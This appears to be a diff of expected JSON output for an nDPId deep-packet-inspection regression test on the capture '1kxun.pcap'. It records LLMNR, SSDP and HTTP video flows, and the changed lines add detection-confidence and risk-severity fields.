 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104381935,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUIAAAERlcbAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"}
-01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}}
+01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"}
-01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}}
-01191{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}}
+01273{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}}
+01297{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1470104382242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104382242,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfYYAAAERhhrAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"ts_msec":1470104382448,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
